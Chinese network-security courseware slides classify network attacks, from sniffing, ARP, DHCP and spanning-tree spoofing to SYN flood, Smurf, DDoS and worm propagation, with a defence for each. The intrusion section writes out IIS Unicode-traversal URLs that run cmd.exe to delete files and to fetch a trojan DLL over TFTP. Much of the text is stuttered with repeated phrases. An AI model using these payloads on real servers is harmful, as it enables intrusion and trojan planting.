沈鑫剡编著(网络安全)教材配套课件第2章

1、 2006工程兵工程学院 计算机教研室第二章本章主要内容本章主要内容n网络攻击定义和分类；网络攻击定义和分类；n嗅探攻击嗅探攻击；n截获攻击；截获攻击；n拒绝服务攻击；拒绝服务攻击；n欺骗攻击；欺骗攻击；n非法接入和登录；非法接入和登录；n黑客入侵；黑客入侵；n病毒。病毒。本讲主要内容本讲主要内容n网络攻击定义；网络攻击定义；n网络攻击分类。网络攻击分类。n网络攻击定义网络攻击定义 网络网络攻击是指利用网络存在的漏洞和攻击是指利用网络存在的漏洞和安全缺陷对网络中的硬件、软件及信息进安全缺陷对网络中的硬件、软件及信息进行的攻击，其目的是破坏网络中信息的保行的攻击，其目的是破坏网络中信息的保密性、

2、完整性、可用性、可控制性和不可密性、完整性、可用性、可控制性和不可抵赖性，削弱、甚至瘫痪网络的服务功能。抵赖性，削弱、甚至瘫痪网络的服务功能。n网络攻击分类网络攻击分类n主动攻击主动攻击n被动攻击被动攻击1 1主动攻击主动攻击 主动攻击是指会改变网络中的信息、主动攻击是指会改变网络中的信息、状态和信息流模式的攻击行为。主动攻击状态和信息流模式的攻击行为。主动攻击可以破坏信息的保密性、完整性和可用性可以破坏信息的保密性、完整性和可用性等。等。 1 1主动攻击主动攻击n篡改篡改信息；信息；n欺骗欺骗攻击；攻击；n拒绝服务拒绝服务攻击；攻击；n重放重放攻击。攻击。2 2被动攻击被动攻击 被动被动攻击

3、是指不会对经过网络传输的攻击是指不会对经过网络传输的信息、网络状态和网络信息流模式产生影信息、网络状态和网络信息流模式产生影响的攻击行为。被动攻击一般只破坏信息响的攻击行为。被动攻击一般只破坏信息的保密性。的保密性。 2 2被动攻击被动攻击n嗅探嗅探信息；信息；n非法非法访问；访问；n数据流分析。数据流分析。本讲主要内容本讲主要内容n嗅嗅探攻击原理和后果；探攻击原理和后果；n集线器和嗅探攻击；集线器和嗅探攻击；n交换机和交换机和MAC表溢出攻击；表溢出攻击；n嗅嗅探攻击的防御机制。探攻击的防御机制。 1 1嗅探攻击嗅探攻击原理原理 终端终端A A向终端向终端B B传输信息传输信息过程中，信息不

4、仅沿着终端过程中，信息不仅沿着终端A A至终端至终端B B的传输路径传输，的传输路径传输，还沿着终端还沿着终端A A至黑客终端的至黑客终端的传输路径传输，且终端传输路径传输，且终端A A至至黑客终端的传输路径对终端黑客终端的传输路径对终端A A和终端和终端B B都是透明的。都是透明的。 2 2嗅探嗅探攻击后果攻击后果 嗅探攻击后果有以下三点。一是破坏嗅探攻击后果有以下三点。一是破坏信息的保密性信息的保密性。二。二是嗅探攻击是实现数据是嗅探攻击是实现数据流分析攻击的前提流分析攻击的前提。三。三是实施重放攻击是实施重放攻击。 由于由于集线器接收到集线器接收到MACMAC帧后，通过除接收端帧后，通过

5、除接收端口以外的所有其他端口输口以外的所有其他端口输出该出该MACMAC帧，因此，在有帧，因此，在有黑客终端接入集线器的情黑客终端接入集线器的情况下，集线器完成终端况下，集线器完成终端A A至终端至终端B B的的MACMAC帧传输过程帧传输过程的同时，将该的同时，将该MACMAC帧传输帧传输给黑客终端。给黑客终端。 由于交换机转发表中存由于交换机转发表中存在终端在终端B B对应的转发项，该对应的转发项，该转发项表明转发项表明MACMAC地址为地址为MAC BMAC B的终端连接在端口的终端连接在端口2 2上。因上。因此，当终端此，当终端A A发送的源发送的源MACMAC地地址为址为MAC AM

6、AC A、目的、目的MACMAC地址为地址为MAC BMAC B的的MACMAC帧到达交换机时，帧到达交换机时，交换机只从端口交换机只从端口2 2输出该输出该MACMAC帧。这种情况下，黑客终端帧。这种情况下，黑客终端即使与终端即使与终端B B连接在同一个连接在同一个交换机上，也无法接收终端交换机上，也无法接收终端A A传输给终端传输给终端B B的的MACMAC帧。帧。 黑客终端不断发送源黑客终端不断发送源MACMAC地址变化的地址变化的MACMAC帧，如发送一帧，如发送一系列源系列源MACMAC地址分别为地址分别为MAC 1MAC 1、MAC 2MAC 2、MAC nMAC n的的MACMA

7、C帧，帧，使得交换机转发表中添加使得交换机转发表中添加MACMAC地址分别为地址分别为MAC 1MAC 1、MAC 2MAC 2、MAC nMAC n的转发项，这些转发项的转发项，这些转发项耗尽交换机转发表的存储空间，耗尽交换机转发表的存储空间，当交换机接收到终端当交换机接收到终端B B发送的发送的源源MACMAC地址为地址为MAC BMAC B的的MACMAC帧时，帧时，由于转发表的存储空间已经耗由于转发表的存储空间已经耗尽，因此，无法添加新的尽，因此，无法添加新的MACMAC地址为地址为MAC BMAC B的转发项，导致的转发项，导致交换机以广播方式完成交换机以广播方式完成MACMAC帧帧

8、终端终端A A至终端至终端B B传输过程。传输过程。 对于通过集线器实现的嗅探攻击，需要有对于通过集线器实现的嗅探攻击，需要有防止黑客终端接入集线器的措施。对于通过交防止黑客终端接入集线器的措施。对于通过交换机实现的嗅探攻击，一是需要有防止黑客终换机实现的嗅探攻击，一是需要有防止黑客终端接入交换机的措施，二是交换机需要具有防端接入交换机的措施，二是交换机需要具有防御御MACMAC表溢出攻击的机制。表溢出攻击的机制。 对于无线通信过程，嗅探攻击是无法避免对于无线通信过程，嗅探攻击是无法避免的，这种情况下，需要对传输的信息进行加密，的，这种情况下，需要对传输的信息进行加密，使得黑客终端即使嗅探到信

9、息，也因为无法对使得黑客终端即使嗅探到信息，也因为无法对信息解密而无法破坏信息的保密性。信息解密而无法破坏信息的保密性。本讲主要内容本讲主要内容n截获攻击原理和后果；截获攻击原理和后果；nMACMAC地址欺骗攻击；地址欺骗攻击；nDHCP欺骗攻击；欺骗攻击；nARP欺骗攻击；欺骗攻击；n生成树欺骗攻击；生成树欺骗攻击；n路由项欺骗攻击。路由项欺骗攻击。1 1截获攻击原理截获攻击原理 黑客首先需要黑客首先需要改变终端改变终端A A至终端至终端B B的传输路径，将终的传输路径，将终端端A A至终端至终端B B的传输的传输路径变为终端路径变为终端A A黑黑客终端客终端终端终端B B，使，使得终端得终

10、端A A传输给终端传输给终端B B的信息必须经过黑的信息必须经过黑客终端。客终端。2 2截获攻击后果截获攻击后果n获得用户的私密信息；获得用户的私密信息；n篡改信息；篡改信息；n实施重放攻击。实施重放攻击。1 1MACMAC帧正常转发过程帧正常转发过程 终端终端C C至终端至终端A A的的MACMAC帧传输路径帧传输路径是：终端是：终端C CS3.S3.端端口口1 1S3.S3.端口端口2 2S2.S2.端口端口2 2S2.S2.端口端口1 1S1.S1.端口端口3 3S1.S1.端口端口1 1终终端端A A，其中交换机，其中交换机S3S3通过转发表中通过转发表中MACMAC地址为地址为MAC

11、 AMAC A的的转发项转发项MAC A2确定确定S3.S3.端口端口1 1S3.S3.端口端口2 2的交换过程。的交换过程。2 2MACMAC地址欺骗攻击过程地址欺骗攻击过程 一是接入以太一是接入以太网，黑客终端通过网，黑客终端通过连接到交换机连接到交换机S3S3的的端口端口3 3接入以太网。接入以太网。二是将自己的二是将自己的MACMAC地址修改为终端地址修改为终端A A的的MACMAC地址地址MAC AMAC A。三。三是发送以是发送以MAC AMAC A为为源源MACMAC地址、以广地址、以广播地址为目的播地址为目的MACMAC地址的地址的MACMAC帧。帧。 转发表中转发表中MACM

12、AC地址为地址为MAC AMAC A的转发项将通往黑客终端的交的转发项将通往黑客终端的交换路径作为目的换路径作为目的MACMAC地址为地址为MAC AMAC A的的MACMAC帧的传输路径。帧的传输路径。3 3MACMAC地址欺骗攻击防御机制地址欺骗攻击防御机制 一是阻止黑客终端接入以太网，二是阻止一是阻止黑客终端接入以太网，二是阻止黑客终端发送的以伪造的黑客终端发送的以伪造的MACMAC地址为源地址为源MACMAC地址地址的的MACMAC帧进入以太网。帧进入以太网。1 1DHCPDHCP欺骗攻击原理欺骗攻击原理 黑客可以伪造一个黑客可以伪造一个DHCPDHCP服务器，并将其接入网络中，服务器

13、，并将其接入网络中，伪造的伪造的DHCPDHCP服务器中将黑客服务器中将黑客终端的终端的IPIP地址作为默认网关地址作为默认网关地址，当终端从伪造的地址，当终端从伪造的DHCPDHCP服务器获取错误的默认网关服务器获取错误的默认网关地址后，所有发送给其他网地址后，所有发送给其他网络的络的IPIP分组将首先发送给黑分组将首先发送给黑客终端。客终端。2 2DHCPDHCP欺骗攻击过程欺骗攻击过程2 2DHCPDHCP欺骗攻击过程欺骗攻击过程 如果黑客终端想要截获所有如果黑客终端想要截获所有LAN 1LAN 1内终端发内终端发送给其他局域网的送给其他局域网的IPIP分组，可以在分组，可以在LAN 1

14、LAN 1内连接内连接一个伪造的一个伪造的DHCPDHCP服务器，伪造的服务器，伪造的DHCPDHCP服务器配置服务器配置的子网掩码和可分配的的子网掩码和可分配的IPIP地址范围与正常地址范围与正常DHCPDHCP服服务器为务器为LAN 1LAN 1配置的参数基本相同，但将默认网配置的参数基本相同，但将默认网关地址设置为黑客终端地址关地址设置为黑客终端地址5353。如果。如果LAN 1LAN 1内终端通过伪造的内终端通过伪造的DHCPDHCP服务器获得网络信服务器获得网络信息，其中的默认网关地址是黑客终端地址，从而息，其中的默认网关地址是黑客终端地址，从而使

15、得使得LAN 1LAN 1内终端将所有发送给其他局域网的内终端将所有发送给其他局域网的IPIP分组先传输给黑客终端。分组先传输给黑客终端。3 3DHCPDHCP欺骗攻击防御机制欺骗攻击防御机制 防御防御DHCPDHCP欺骗攻击的关键是不允许伪造的欺骗攻击的关键是不允许伪造的DHCPDHCP服务器接入局域网，如以太网交换机端口只服务器接入局域网，如以太网交换机端口只允许接收经过验证的允许接收经过验证的DHCPDHCP服务器发送的服务器发送的DHCPDHCP提供提供和确认消息。和确认消息。1 1ARPARP欺骗攻击原理欺骗攻击原理1 1ARPARP欺骗攻击原理欺骗攻击原理n根据接收终端的根据接收终

16、端的IPIP地址解析出接收终端的地址解析出接收终端的MACMAC地地址的地址解析过程；址的地址解析过程；n终端发送终端发送ARPARP请求报文，请求报文中包含终端的请求报文，请求报文中包含终端的IPIP地址和地址和MACMAC地址对；地址对；n接收接收ARPARP请求报文的终端在请求报文的终端在ARPARP缓冲区中记录缓冲区中记录IPIP地地址和址和MACMAC地址对；地址对；nIPIP地址为目标地址的终端回送地址为目标地址的终端回送ARPARP响应报文。响应报文。1 1ARPARP欺骗攻击原理欺骗攻击原理n终端终端A A发送的发送的ARPARP请求报文请求报文中给出中给出IPIP地址地址IP

17、 BIP B和和MACMAC地地址址MAC AMAC A对；对；n其他终端其他终端ARPARP缓冲区建立缓冲区建立IP BIP B与与MAC AMAC A之间绑定；之间绑定；n其他终端将目的其他终端将目的IPIP地址为地址为IP BIP B的的IPIP分组封装成以分组封装成以MAC MAC A A为目的为目的MACMAC地址的地址的MACMAC帧。帧。2 2ARPARP欺骗攻击过程欺骗攻击过程2 2ARPARP欺骗攻击过程欺骗攻击过程黑客终端发送将黑客终端发送将IP AIP A和和MAC CMAC C绑定的绑定的ARPARP请求请求报文；报文；路由器缓冲区中记录路由器缓冲区中记录IP AIP

18、A和和MAC CMAC C绑定项；绑定项；路由器将目的路由器将目的IPIP地址为地址为IP AIP A的的IPIP分组封装成分组封装成以以MAC CMAC C为目的为目的MACMAC地址的地址的MACMAC帧。帧。3 3ARPARP欺骗攻击防御机制欺骗攻击防御机制 终端没有鉴别终端没有鉴别ARPARP请求和响应报文中请求和响应报文中IPIP地地址与址与MACMAC地址绑定项真伪的功能，因此，需要地址绑定项真伪的功能，因此，需要以太网交换机提供鉴别以太网交换机提供鉴别ARPARP请求和响应报文中请求和响应报文中IPIP地址与地址与MACMAC地址绑定项真伪的功能，以太网地址绑定项真伪的功能，以太

19、网交换机只继续转发包含正确的交换机只继续转发包含正确的IPIP地址与地址与MACMAC地地址绑定项的址绑定项的ARPARP请求和响应报文。请求和响应报文。1 1生成树协议工作原理生成树协议工作原理 生成树协议通过阻塞端口将一个原本存在环生成树协议通过阻塞端口将一个原本存在环路的以太网拓扑结构转换成树形拓扑结构。路的以太网拓扑结构转换成树形拓扑结构。1 1生成树协议工作原理生成树协议工作原理 交换机优先级是可以配置的，交换机优先级交换机优先级是可以配置的，交换机优先级最高的交换机成为根交换机。最高的交换机成为根交换机。2 2生成树欺骗攻击过程生成树欺骗攻击过程2 2生成树欺骗攻击过程生成树欺骗攻

20、击过程n黑客终端分别通过两个以太网接口连接到交换机黑客终端分别通过两个以太网接口连接到交换机S1S1和和S3S3；n黑客终端配置最高交换机优先级，从而十七成为黑客终端配置最高交换机优先级，从而十七成为根交换机；根交换机；n黑客终端截获终端黑客终端截获终端A A、终端、终端B B与终端与终端C C之间传输的之间传输的MACMAC帧。帧。3 3生成树欺骗攻击防御机制生成树欺骗攻击防御机制 防御生成树欺骗攻击的前提是，不允许黑客防御生成树欺骗攻击的前提是，不允许黑客终端参与网络生成树建立过程，即只在用于实现终端参与网络生成树建立过程，即只在用于实现两个认证交换机之间互连的交换机端口启动生成两个认证交

21、换机之间互连的交换机端口启动生成树协议。树协议。1 1路由项欺骗攻击原理路由项欺骗攻击原理 正常情况下，路由器正常情况下，路由器R1R1通往网络通往网络W W的传输路径的下一跳是的传输路径的下一跳是路由器路由器R2R2，则通过路由器，则通过路由器R2R2发送给它的目的网络为网络发送给它的目的网络为网络W W的路的路由项计算出路由器由项计算出路由器R1R1路由表中目的网络为网络路由表中目的网络为网络W W的路由项。的路由项。1 1路由项欺骗攻击原理路由项欺骗攻击原理 黑客终端向路由器黑客终端向路由器R1R1发送一项伪造的路由项，该伪造的发送一项伪造的路由项，该伪造的路由项将通往网络路由项将通往网

22、络W W的距离设置为的距离设置为0 0。路由器。路由器R1R1接收到该路由接收到该路由项后，选择黑客终端作为通往网络项后，选择黑客终端作为通往网络W W的传输路径的下一跳，并的传输路径的下一跳，并重新计算出路由表中目的网络为网络重新计算出路由表中目的网络为网络W W的路由项。的路由项。2 2路由项欺骗攻击过程路由项欺骗攻击过程2 2路由项欺骗攻击过程路由项欺骗攻击过程 黑客终端发送一项黑客终端发送一项LAN 4LAN 4与其直接相连的路由项；与其直接相连的路由项； 路由器路由器R1R1将通往将通往LAN 4LAN 4传输路径上的下一跳改为传输路径上的下一跳改为黑客终端；黑客终端； 路由器路由器

23、R1R1将目的网络是将目的网络是LAN 4LAN 4的的IPIP分组转发给黑分组转发给黑客终端。客终端。3 3路由项欺骗攻击防御机制路由项欺骗攻击防御机制 为了防御路由项欺骗攻击，路由器接收到为了防御路由项欺骗攻击，路由器接收到路由消息后，首先需要鉴别路由消息的发送端，路由消息后，首先需要鉴别路由消息的发送端，并对路由消息进行完整性检测，确定路由消息并对路由消息进行完整性检测，确定路由消息是由经过认证的相邻路由器发送，且路由消息是由经过认证的相邻路由器发送，且路由消息传输过程中没有被篡改后，才处理该路由消息，传输过程中没有被篡改后，才处理该路由消息，并根据处理结果更新路由表。并根据处理结果更新

24、路由表。本讲主要内容本讲主要内容nSYNSYN泛洪攻击；泛洪攻击；nSmurfSmurf攻击；攻击；nDDOS。1 1SYNSYN泛洪攻击原理泛洪攻击原理 SYS SYS泛洪攻击就是通过快速消耗掉泛洪攻击就是通过快速消耗掉WebWeb服务器服务器TCPTCP会话表中的连接项，使得正常的会话表中的连接项，使得正常的TCPTCP连接建立连接建立过程因为会话表中连接项耗尽而无法正常进行的过程因为会话表中连接项耗尽而无法正常进行的攻击行为。攻击行为。2 2SYNSYN泛洪攻击过程泛洪攻击过程通过大量未完成的通过大量未完成的TCPTCP连接耗尽连接耗尽WebWeb服务器的会话表资源。服务器的会话表资源。

25、3 3SYNSYN泛洪攻击防御机制泛洪攻击防御机制 实施实施SYNSYN泛洪攻击的前提是伪造源泛洪攻击的前提是伪造源IPIP地址，因此，最直地址，因此，最直接的防御接的防御SYNSYN泛洪攻击的办法是，使网络具有阻止伪造源泛洪攻击的办法是，使网络具有阻止伪造源IPIP地址的地址的IPIP分组继续传输的功能。分组继续传输的功能。 SYN SYN泛洪攻击导致大量处于未完成状态的泛洪攻击导致大量处于未完成状态的TCPTCP连接，如连接，如果会话表只对处于完成状态的果会话表只对处于完成状态的TCPTCP连接分配连接项，连接分配连接项，SYNSYN泛泛洪攻击将无法耗尽会话表中的连接项。洪攻击将无法耗尽会

26、话表中的连接项。1 1SmurfSmurf攻击原理攻击原理n黑客终端发送一个以攻击目标的黑客终端发送一个以攻击目标的IPIP地址为源地址为源IPIP地址的地址的ICMP ICMP ECHOECHO请求报文；请求报文；n接收到接收到ICMP ECHOICMP ECHO请求报文的终端向攻击目标发送请求报文的终端向攻击目标发送ICMP ECHOICMP ECHO响应报文。响应报文。1 1SmurfSmurf攻击原理攻击原理 黑客终黑客终端在网络中端在网络中广播一个以广播一个以攻击目标的攻击目标的IPIP地址为源地址为源IPIP地址的地址的ICMP ECHOICMP ECHO请请求报文，网求报文，网络

27、中所有终络中所有终端向攻击目端向攻击目标发送标发送ICMP ICMP ECHOECHO响应报响应报文。文。2 2SmurfSmurf攻击过程攻击过程 黑客终端分别在黑客终端分别在LAN 3LAN 3和和LAN 4LAN 4中广播中广播一个以攻击目标的一个以攻击目标的IPIP地址为源地址为源IPIP地址的地址的ICMP ECHOICMP ECHO请求报文，请求报文，LAN 3LAN 3和和LAN 4LAN 4中所有中所有终端向攻击目标发送终端向攻击目标发送ICMP ECHOICMP ECHO响应报文。响应报文。耗尽攻击目标连接网耗尽攻击目标连接网络链路的带宽和攻击络链路的带宽和攻击目标的处理能力

28、。目标的处理能力。3 3 Smurf Smurf攻击防御机制攻击防御机制n使网络具有阻止伪造源使网络具有阻止伪造源IPIP地址的地址的IPIP分组继续传输分组继续传输的功能；的功能；n路由器阻止以直接广播地址为目的路由器阻止以直接广播地址为目的IPIP地址的地址的IPIP分分组继续转发；组继续转发；n主机系统拒绝响应主机系统拒绝响应ICMP ECHOICMP ECHO请求报文。请求报文。1 1直接直接DDoSDDoS攻击攻击 攻击组织者攻击组织者首先通过其他攻首先通过其他攻击手段攻陷大量击手段攻陷大量主机系统，并植主机系统，并植入攻击程序，然入攻击程序，然后，激活这些攻后，激活这些攻击程序。攻

29、击程击程序。攻击程序产生大量无用序产生大量无用的的UDPUDP报文或报文或ICMP ICMP ECHOECHO请求报文，请求报文，并将这些报文发并将这些报文发送给攻击目标。送给攻击目标。间接间接DDoSDDoS攻击攻击 攻击组织者激活植入攻击组织者激活植入肉鸡中的攻击程序，攻击肉鸡中的攻击程序，攻击程序随机产生大量程序随机产生大量IPIP地址，地址，并以这些并以这些IPIP地址为目的地址为目的IPIP地址、以攻击目标的地址、以攻击目标的IPIP地地址为源址为源IPIP地址构建地址构建ICMP ICMP ECHOECHO请求报文。这些请求请求报文。这些请求报文到达目的端后，由目报文到达目的端后，

30、由目的端产生以请求报文的源的端产生以请求报文的源IPIP地址（攻击目标地址（攻击目标IPIP地址）地址）为目的地址的为目的地址的ICMP ECHOICMP ECHO响响应报文，大量应报文，大量ICMP ECHOICMP ECHO响响应报文到达攻击目标。应报文到达攻击目标。3 3DDoSDDoS攻击防御机制攻击防御机制 防御防御DDoSDDoS攻击一是需要尽可能地减少肉鸡，这就要求攻击一是需要尽可能地减少肉鸡，这就要求连接在互联网上的主机系统能够具备防御病毒和黑客入侵连接在互联网上的主机系统能够具备防御病毒和黑客入侵的能力。二是使主机系统拒绝响应的能力。二是使主机系统拒绝响应ICMP ECHOI

31、CMP ECHO请求报文。请求报文。三是网络具有统计目的三是网络具有统计目的IPIP地址相同的地址相同的ICMP ECHOICMP ECHO响应报文，响应报文，或或ICMPICMP差错报告报文数量的能力，如果网络中单位时间内差错报告报文数量的能力，如果网络中单位时间内经过的目的经过的目的IPIP地址相同的地址相同的ICMP ECHOICMP ECHO响应报文，或响应报文，或ICMPICMP差差错报告报文的数量超过设定的阈值，网络能够丢弃部分错报告报文的数量超过设定的阈值，网络能够丢弃部分ICMP ECHOICMP ECHO响应报文，或响应报文，或ICMPICMP差错报告报文。差错报告报文。本讲

32、主要内容本讲主要内容n源源IPIP地址欺骗攻击；地址欺骗攻击；n钓鱼网站。钓鱼网站。1 1源源IPIP地址欺骗攻击原理地址欺骗攻击原理 源源IPIP地址欺骗是指某个终端发送地址欺骗是指某个终端发送IPIP分组时，不是以该分组时，不是以该终端真实的终端真实的IPIP地址作为源地址作为源IPIP地址，而是用其它终端的地址，而是用其它终端的IPIP地地址，或者伪造一个本不存在的址，或者伪造一个本不存在的IPIP地址作为地址作为IPIP分组的源分组的源IPIP地地址的行为。址的行为。2 2源源IPIP地址欺骗攻击防御机制地址欺骗攻击防御机制 网络接收到某个网络接收到某个IPIP分组时，首先判别该分组时

33、，首先判别该IPIP分组的源分组的源IPIP地址是否与发送该地址是否与发送该IPIP分组的终端的分组的终端的IPIP地址一致，如果不一地址一致，如果不一致，终止该致，终止该IPIP分组的转发过程。分组的转发过程。1 1钓鱼网站实施原理钓鱼网站实施原理 钓鱼网站是指黑客模仿某个著名网站的假网站，用钓鱼网站是指黑客模仿某个著名网站的假网站，用户访问钓鱼网站过程是指用户用该著名网站的域名访问户访问钓鱼网站过程是指用户用该著名网站的域名访问到黑客模仿该著名网站的假网站的过程，即虽然用户在到黑客模仿该著名网站的假网站的过程，即虽然用户在浏览器地址栏中输入该著名网站的域名，但实际访问的浏览器地址栏中输入该

34、著名网站的域名，但实际访问的是黑客模仿该著名网站的假网站。是黑客模仿该著名网站的假网站。2 2钓鱼网站实施过程钓鱼网站实施过程1.1. 伪造的伪造的DHCPDHCP服务器中给出错误的服务器中给出错误的域名服务器地址；域名服务器地址；2.2. 伪造的域名服务器中给出错误的伪造的域名服务器中给出错误的与域名与域名绑定的绑定的IPIP地地址；址；3.3. 导致用正确的域名导致用正确的域名访问到伪造的访问到伪造的webweb服务器。服务器。3 3钓鱼网站防御机制钓鱼网站防御机制 一是主机具有防御黑客入侵的能力，黑一是主机具有防御黑客入侵的能力，黑客无法修改主机信息。二是以太网交换机具客无法修改主机信息

35、。二是以太网交换机具有防止伪造的有防止伪造的DHCPDHCP服务器接入的能力，只允服务器接入的能力，只允许经过认证的许经过认证的DHCPDHCP服务器接入以太网。三是服务器接入以太网。三是终端具有鉴别终端具有鉴别WebWeb服务器的能力，证实服务器的能力，证实WebWeb服服务器身份后，才对务器身份后，才对WebWeb服务器进行访问。服务器进行访问。本讲主要内容本讲主要内容n非法接入无线局域网；非法接入无线局域网；n非法登录。非法登录。网络结构网络结构1 1获得获得SSID SSID 黑客终端可以通过侦听信标帧或探测响应帧获得黑客终端可以通过侦听信标帧或探测响应帧获得APAP的的SSIDSSI

36、D。2 2非法接入过程非法接入过程n黑客终端截获正常身份鉴别过程中交换的黑客终端截获正常身份鉴别过程中交换的P P、Y Y和和IVIV；n黑客终端求出黑客终端求出K=PY;K=PY;n黑客终端得到黑客终端得到APAP发送的发送的PP后，求出后，求出Y = P Y = P KK和和K K对应的对应的IVIV。3 3非法接入防御机制非法接入防御机制 防御黑客终端非法接入的主要方法是，防御黑客终端非法接入的主要方法是，APAP不用通过一次性密钥不用通过一次性密钥K K异或随机数异或随机数P P生成的密文生成的密文Y Y来证明授权终端拥有共享密钥来证明授权终端拥有共享密钥GKGK。1 1登录过程登录过

37、程 终端终端A A和终端和终端B B可以通过可以通过TelnetTelnet命令远程登命令远程登录网络设备和录网络设备和WebWeb服务器，对网络设备和服务器，对网络设备和WebWeb服服务器进行配置和管理。务器进行配置和管理。2 2非法登录过程非法登录过程 非法登录是指非授权用户远程登录网络设非法登录是指非授权用户远程登录网络设备和备和WebWeb服务器，并对网络设备和服务器，并对网络设备和WebWeb服务器进服务器进行非法配置的攻击行为。行非法配置的攻击行为。3 3非法登录防御机制非法登录防御机制 一是使得授权用户正常登录时，以密文方一是使得授权用户正常登录时，以密文方式向网络设备和式向网

38、络设备和WebWeb服务器传输用户身份标识信服务器传输用户身份标识信息，如用户名和口令。二是要求网络设备和息，如用户名和口令。二是要求网络设备和WebWeb服务器设置的口令必须具备一定长度，同时包服务器设置的口令必须具备一定长度，同时包含数字、大写字母、小写字母和特殊字符，使含数字、大写字母、小写字母和特殊字符，使得黑客短时间内无法通过暴力破解来获得口令。得黑客短时间内无法通过暴力破解来获得口令。本讲主要内容本讲主要内容n信息收集；信息收集；n扫描；扫描；n渗透；渗透；n攻击；攻击；n黑客入侵防御机制。黑客入侵防御机制。n开放的网络服务；开放的网络服务；n企业服务器域名和企业服务器域名和IPI

39、P地址；地址；n企业信息；企业信息；n无线接入设备；无线接入设备；n其他一些信息。其他一些信息。n获取网络拓扑结构获取网络拓扑结构nPingPingnTracertTracertn获取操作系统类型和版本获取操作系统类型和版本n侦听端口对置位侦听端口对置位FINFIN位位TCPTCP报文的反应报文的反应n侦听端口对置位侦听端口对置位SYNSYN位，且同时置位其他无效标志位，且同时置位其他无效标志位的报文的反应位的报文的反应n不同的初始序号不同的初始序号n不同的初始窗口值不同的初始窗口值n封装封装TCPTCP报文的报文的IPIP分组的分组的DFDF位位nICMPICMP出错消息的频率限制出错消息的

40、频率限制nICMPICMP消息内容消息内容n获取应用程序类型和版本获取应用程序类型和版本n端口扫描端口扫描n获取应用程序信息获取应用程序信息1 1植入木马病毒过程植入木马病毒过程（1）利用Unicode漏洞植入木马/ scripts/.%c0%2f./ winnt/system32/cmd.exe?/c+del+c:inetpubUnicode编码“%c0%2f”表示“/”“/scripts/.%c0%2f./ winnt/system32/”=“scripts/././winnt/system32/”1 1植入木马病毒过程植入木马病毒过程 将木马服务器软件将木马

41、服务器软件idq.dllidq.dll存入存入TFTPTFTP服务器，然后服务器，然后通过在浏览器地址栏输入：通过在浏览器地址栏输入：/ scripts/.%c0%2f./ / scripts/.%c0%2f./ winnt/system32/cmd.exe?/c+tftp+-iwinnt/system32/cmd.exe?/c+tftp+-i++get+idq.dll++get+idq.dll 2 2蠕虫病毒蔓延过程蠕虫病毒蔓延过程 （1 1）缓冲区溢出）缓冲区溢出 由于函数由于函数B B使用缓冲

42、区时没有检测缓冲区边界这一步，使用缓冲区时没有检测缓冲区边界这一步，当函数当函数B B的输入数据超过规定长度时，函数的输入数据超过规定长度时，函数B B的缓冲区发生的缓冲区发生溢出，超过规定长度部分的数据将继续占用其他存储空间，溢出，超过规定长度部分的数据将继续占用其他存储空间，覆盖用于保留函数覆盖用于保留函数A A的返回地址的存储单元。的返回地址的存储单元。 2 2蠕虫病毒蔓延过程蠕虫病毒蔓延过程 （2 2）扫描）扫描WebWeb服务器服务器 扫描扫描WebWeb服务器的第一步是确定服务器的第一步是确定IPIP地址产生方地址产生方式，或是指定一组式，或是指定一组IPIP地址，然后，逐个扫描地

43、址，然后，逐个扫描IPIP地地址列表中的址列表中的IPIP地址；或是随机产生地址；或是随机产生IPIP地址。地址。 确定目标主机是否是确定目标主机是否是WebWeb服务器的方法是尝试服务器的方法是尝试建立与目标主机之间目的端口号为建立与目标主机之间目的端口号为8080的的TCPTCP连接，连接，如果成功建立该如果成功建立该TCPTCP连接，表明目标主机是连接，表明目标主机是WebWeb服服务器。务器。 2 2蠕虫病毒蔓延过程蠕虫病毒蔓延过程 （3 3）获取）获取WebWeb服务器信息服务器信息 通过建立的目的端口号为通过建立的目的端口号为8080的的TCPTCP连接向目标连接向目标主机发送一个

44、错误的主机发送一个错误的HTTPHTTP请求消息，目标主机回请求消息，目标主机回送的送的HTTPHTTP响应消息中会给出有关目标主机响应消息中会给出有关目标主机WebWeb服务服务器的一些信息。器的一些信息。 2 2蠕虫病毒蔓延过程蠕虫病毒蔓延过程 （4 4）通过缓冲区溢出植入并运行引导程序）通过缓冲区溢出植入并运行引导程序 一旦确定一旦确定WebWeb服务器存在缓冲区溢出漏洞，精服务器存在缓冲区溢出漏洞，精心设计一个心设计一个HTTPHTTP请求消息，请求消息，WebWeb服务器将该服务器将该HTTPHTTP请请求消息读入缓冲区时会导致缓冲区溢出，并运行求消息读入缓冲区时会导致缓冲区溢出，并

45、运行嵌入在嵌入在HTTPHTTP请求消息中的引导程序，引导程序和请求消息中的引导程序，引导程序和黑客终端建立反向黑客终端建立反向TCPTCP连接，并从黑客终端下载完连接，并从黑客终端下载完整的蠕虫病毒并激活。蠕虫病毒一方面建立一个整的蠕虫病毒并激活。蠕虫病毒一方面建立一个管理员账户，供黑客以后入侵用，一方面开始步管理员账户，供黑客以后入侵用，一方面开始步骤（）（），继续扩散病毒。骤（）（），继续扩散病毒。 1 1成功植入木马病毒后的攻击过程成功植入木马病毒后的攻击过程 ispc /scripts/idq.dllispc /scripts/idq.dll

46、激活激活WebWeb服务器服务器“/scripts/scripts”目录下的文件目录下的文件idq.dllidq.dll，并因此进入，并因此进入WebWeb服务器的服务器的DOSDOS命令行，命令行，ispc.exeispc.exe是客户端软件的名称。是客户端软件的名称。ispc.exeispc.exe和和idq.dllidq.dll是著名木马软件的客户端和服务器端程序。是著名木马软件的客户端和服务器端程序。 2 2蠕虫病毒蔓延后的攻击过程蠕虫病毒蔓延后的攻击过程 自动执行蠕虫病毒的结果是在目标主机上启自动执行蠕虫病毒的结果是在目标主机上启动动TelnetTelnet服务，并建立具有管理员权限

47、的用户。服务，并建立具有管理员权限的用户。因此，黑客可以随时通过因此，黑客可以随时通过TelnetTelnet连接目标主机，连接目标主机，获取目标主机中的信息资源。获取目标主机中的信息资源。n阻断黑客终端与攻击目标之间的传输通路；阻断黑客终端与攻击目标之间的传输通路；n消除漏洞；消除漏洞；n检测主机。检测主机。本讲主要内容本讲主要内容n恶意代码定义；恶意代码定义；n恶意代码分类；恶意代码分类；n病毒一般结构；病毒一般结构；n病毒分类；病毒分类；n病毒实现技术；病毒实现技术；n病毒防御机制。病毒防御机制。 代码是指一段用于完成特定功能的计代码是指一段用于完成特定功能的计算机程序，恶意代码是指经过

